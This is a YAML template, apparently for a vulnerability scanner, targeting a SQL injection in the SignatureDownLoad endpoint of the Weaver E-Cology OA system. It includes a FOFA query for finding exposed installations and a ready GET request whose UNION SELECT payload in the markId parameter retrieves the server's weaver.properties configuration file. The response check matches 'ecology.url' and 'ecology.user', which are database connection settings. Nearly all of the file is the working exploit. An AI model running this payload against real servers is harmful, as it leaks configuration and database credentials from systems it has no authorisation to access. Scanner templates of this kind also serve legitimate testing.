product: 泛微 E-Cology
vName: 泛微E-Cology SignatureDownLoad接口SQL注入
type: SQL注入
vID: [ ]
level: 3
vDesc: 泛微E-Cology SignatureDownLoad接口SQL注入
version: ''
note: ''
search:
  FOFA: app="泛微-OA（e-cology）"
protocol: http
link: https://blog.csdn.net/qq_37113223/article/details/138890294
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /weaver/weaver.file.SignatureDownLoad?markId=0%20union%20select%20%27../ecology/WEB-INF/prop/weaver.properties%27
    verify:
      path: ''
      logic: and
      check:
        - body:
            value:
              - ecology.url
              - ecology.user
            logic: 'and'